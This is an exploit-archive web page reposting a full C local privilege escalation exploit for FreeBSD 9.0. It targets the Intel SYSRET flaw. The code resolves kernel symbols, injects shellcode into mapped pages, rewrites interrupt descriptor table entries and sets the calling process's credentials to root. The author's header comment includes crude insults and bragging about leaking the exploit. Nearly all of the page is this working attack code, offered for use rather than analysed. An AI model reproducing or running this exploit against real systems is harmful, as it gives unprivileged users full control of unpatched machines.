FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

来源：vfocus.net 作者：CurcolHekerLink 发布时间：2013-10-08

/* 
 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit 
 * Author by CurcolHekerLink 
 *  
 * This exploit based on open source project, I can make it open source too. Right? 
 *  
 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :) 
 * 
 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink, 
 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam 
 * if you would like next private exploit leakage, just mention @MamahhDedeh 
 * 
 * Some people may feel harmed when we release this exploit :)) 
 * 
 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :)) 
 * 
 */
  
#include <stdio.h> 
#include <stdlib.h> 
#include <stdint.h> 
#include <unistd.h> 
#include <string.h> 
#include <sys/mman.h> 
#include <machine/cpufunc.h> 
#define _WANT_UCRED 
#include <sys/proc.h> 
#include <machine/segments.h> 
#include <sys/param.h> 
#include <sys/linker.h> 
#define TRIGGERSIZE 20 
#define BOUNCESIZE 18 
  
uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp; 
  
struct gate_descriptor * sidt() 
{ 
    struct region_descriptor idt; 
    asm ("sidt %0": "=m"(idt)); 
    return (struct gate_descriptor*)idt.rd_base; 
} 
  
u_long matchsym(char *symname) 
{ 
    struct kld_sym_lookup ksym; 
    ksym.version = sizeof (ksym); 
    ksym.symname = symname; 
    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) { 
        perror("kldsym"); 
        exit(1); 
    } 
    return ksym.symvalue; 
} 
  
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist) 
{ 
    struct gate_descriptor *ip; 
    ip = idt + idx; 
    ip->gd_looffset = func; 
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL); 
    ip->gd_ist = ist; 
    ip->gd_xx = 0; 
    ip->gd_type = typ; 
    ip->gd_dpl = dpl; 
    ip->gd_p = 1; 
    ip->gd_hioffset = func>>16; 
} 
  
void payload() 
{ 
    printf("[+] Woohoo!!!\n"); 
    exit(0); 
} 
  
void resetidt() 
{ 
    struct thread *td; 
    struct ucred *cred; 
    struct gate_descriptor *idt = sidt(); 
    setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);  
    setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0); 
    setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0); 
      
    asm ("mov %%gs:0, %0" : "=r"(td)); 
      
    cred = td->td_proc->p_ucred; 
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0; 
    cred->cr_groups[0] = 0; 
      
    asm ("swapgs; sysretq;" :: "c"(payload)); 
} 
  
void resolving() 
{ 
    Xdivp = (uintptr_t)matchsym("Xdiv"); 
    Xdbgp = (uintptr_t)matchsym("Xdbg"); 
    Xbptp = (uintptr_t)matchsym("Xbpt"); 
    Xoflp = (uintptr_t)matchsym("Xofl"); 
    Xbndp = (uintptr_t)matchsym("Xbnd"); 
    Xillp = (uintptr_t)matchsym("Xill"); 
    Xdnap = (uintptr_t)matchsym("Xdna"); 
    Xfpusegmp = (uintptr_t)matchsym("Xfpusegm"); 
    Xtssp = (uintptr_t)matchsym("Xtss"); 
    Xmissingp = (uintptr_t)matchsym("Xmissing"); 
    Xstkp = (uintptr_t)matchsym("Xstk"); 
    Xprotp = (uintptr_t)matchsym("Xprot"); 
    Xpagep = (uintptr_t)matchsym("Xpage"); 
    Xfpup = (uintptr_t)matchsym("Xfpu"); 
    Xalignp = (uintptr_t)matchsym("Xalign"); 
    Xmchkp = (uintptr_t)matchsym("Xmchk"); 
    Xxmmp = (uintptr_t)matchsym("Xxmm"); 
} 
  
void trigger() 
{ 
    printf("[+] Crotz...\n"); 
    uint64_t pagesize = getpagesize(); 
    uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize); 
    mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0); 
    if (mappedarea == MAP_FAILED) { 
        perror("mmap (trigger)"); 
        exit(1); 
    } 
  
    char triggerpayload[] = 
        "\xb8\x18\x00\x00\x00"
        "\x48\x89\xe3"
        "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
        "\x0f\x05"; 
  
    uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE; 
    memcpy(offset_addr, triggerpayload, TRIGGERSIZE); 
  
    *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8); 
    printf("[+] Crotz...\n"); 
    char bouncepayload[] = 
        "\x0f\x01\xf8"
        "\x48\x89\xdc"
        "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
        "\xff\xe0"; 
  
    uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF)); 
    size_t bouncer_allocsize = pagesize; 
    if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE) 
        bouncer_allocsize += pagesize; 
    if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED) 
    { 
        perror("mmap (bouncer)"); 
        exit(1); 
    } 
    memcpy(bouncer, bouncepayload, BOUNCESIZE); 
    *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt; 
    ((void (*)())offset_addr)(); 
} 
  
int main(int argc, char *argv[]) 
{ 
    printf("[+] SYSRET FUCKUP!!\n"); 
    printf("[+] Start Engine...\n"); 
    resolving(); 
    printf("[+] Crotz...\n"); 
    trigger(); 
    return 0; 
}

[

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

相关文章

·SIEMENS Solid Edge ST4 SEListC
·Evince PDF Reader 2.32.0.145 /
·Apache Tomcat/JBoss EJBInvoker
·Ice Cold Apps Servers Ultimate
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·Apple Motion 5.0.7 Integer Ove
·Internet Explorer 7.0 "documen
·FlashChat Arbitrary File Uploa
·Internet Explorer "wshom.ocx"
·ClipBucket Remote Code Executi
·Astium Remote Code Execution V
·GestioIP Remote Command Execut

推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved